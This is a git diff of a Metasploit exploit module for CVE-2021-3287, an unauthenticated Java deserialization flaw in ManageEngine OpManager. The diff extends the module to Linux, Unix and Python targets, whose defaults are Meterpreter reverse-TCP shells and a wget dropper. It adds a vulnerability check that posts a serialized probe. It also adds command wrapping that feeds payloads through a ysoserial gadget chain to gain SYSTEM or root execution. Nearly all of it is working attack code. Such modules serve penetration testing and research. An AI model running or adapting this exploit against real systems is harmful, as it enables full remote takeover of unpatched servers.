diff --git a/modules/exploits/multi/http/opmanager_sumpdu_deserialization.rb b/modules/exploits/multi/http/opmanager_sumpdu_deserialization.rb index 1661713debc6c..d276454c6fb9b 100644 --- a/modules/exploits/multi/http/opmanager_sumpdu_deserialization.rb +++ b/modules/exploits/multi/http/opmanager_sumpdu_deserialization.rb @@ -17,13 +17,19 @@ def initialize(info = {}) info, 'Name' => 'ManageEngine OpManager SumPDU Java Deserialization', 'Description' => %q{ + An HTTP endpoint used by the Manage Engine OpManager Smart Update Manager component can be leveraged to + deserialize an arbitrary Java object. This can be abused by an unauthenticated remote attacker to execute OS + commands in the context of the OpManager application (NT AUTHORITY\SYSTEM on Windows or root on Linux). This + vulnerability is also present in other products that are built on top of the OpManager application. }, 'Author' => [ - 'Spencer McIntyre', # Metasploit module + 'Johannes Moritz', # Original Vulnerability Research + 'Robin Peraglie', # Original Vulnerability Research + 'Spencer McIntyre' # Metasploit module ], 'License' => MSF_LICENSE, - 'Platform' => 'win', - 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], + 'Arch' => [ARCH_CMD, ARCH_PYTHON, ARCH_X86, ARCH_X64], + 'Platform' => [ 'win', 'linux', 'python', 'unix' ], 'References' => [ [ 'CVE', '2021-3287' ], [ 'URL', 'https://haxolot.com/posts/2021/manageengine_opmanager_pre_auth_rce/' ] @@ -34,6 +40,7 @@ def initialize(info = {}) 'Windows Command', { 'Arch' => ARCH_CMD, + 'Platform' => 'win', 'Type' => :win_cmd, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp' @@ -44,22 +51,54 @@ def initialize(info = {}) 'Windows Dropper', { 'Arch' => [ARCH_X86, ARCH_X64], + 'Platform' => 'win', 'Type' => :win_dropper, - # 'CmdStagerFlavor' => :certutil, # This works without issue 'DefaultOptions' => { 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' } } ], [ - 'PowerShell Stager', + 'Windows PowerShell', { 'Arch' => [ARCH_X86, ARCH_X64], - 'Type' => :psh_stager, + 'Platform' => 'win', + 'Type' => :win_psh, 'DefaultOptions' => { 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' } } + ], + [ + 'Unix Command', + { + 'Arch' => ARCH_CMD, + 'Platform' => 'unix', + 'Type' => :nix_cmd + } + ], + [ + 'Linux Dropper', + { + 'Arch' => [ARCH_X86, ARCH_X64], + 'Platform' => 'linux', + 'Type' => :nix_dropper, + 'DefaultOptions' => { + 'CMDSTAGER::FLAVOR' => 'wget', + 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' + } + } + ], + [ + 'Python', + { + 'Arch' => ARCH_PYTHON, + 'Platform' => 'python', + 'Type' => :python, + 'DefaultOptions' => { + 'PAYLOAD' => 'python/meterpreter/reverse_tcp' + } + } ] ], 'DefaultOptions' => { @@ -81,8 +120,17 @@ def initialize(info = {}) end def check - # TODO: write this - return Exploit::CheckCode::Unknown + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, '/servlets/com.adventnet.tools.sum.transport.SUMHandShakeServlet'), + # Serialized int 1002 + 'data' => "\xac\xed\x00\x05\x77\x04\x00\x00\x03\xea".b + }) + return Exploit::CheckCode::Unknown unless res + # the patched version will respond back with 200 OK and no data in the response body + return Exploit::CheckCode::Safe unless res.code == 200 && res.body.start_with?("\xac\xed\x00\x05".b) + + Exploit::CheckCode::Appears end def exploit @@ -111,25 +159,36 @@ def exploit # Step 3: Exploit the deserialization vulnerability to run commands case target['Type'] - when :win_cmd - execute_command(payload.encoded) + when :nix_dropper + execute_cmdstager when :win_dropper execute_cmdstager - when :psh_stager + when :win_psh execute_command(cmd_psh_payload( payload.encoded, payload.arch.first, remove_comspec: true )) + else + execute_command(payload.encoded) end end def execute_command(cmd, _opts = {}) - vprint_status("Executing command: #{cmd}") - # the frohoff/ysoserial#168 gadget chain is a derivative of CommonsBeanutils1 that has been updated to remove the # dependency on the commons-collections library making it usable in this context - java_payload = Msf::Util::JavaDeserialization.ysoserial_payload('frohoff/ysoserial#168', "cmd.exe /c #{cmd}") + case target['Platform'] + when 'python' + cmd.prepend('python -c ') + when 'win' + cmd.prepend('cmd.exe /c ') + else + cmd.gsub!(/\s+/, '${IFS}') + cmd.prepend('sh -c ') + end + + vprint_status("Executing command: #{cmd}") + java_payload = Msf::Util::JavaDeserialization.ysoserial_payload('frohoff/ysoserial#168', cmd) res = send_request_cgi({ 'method' => 'POST',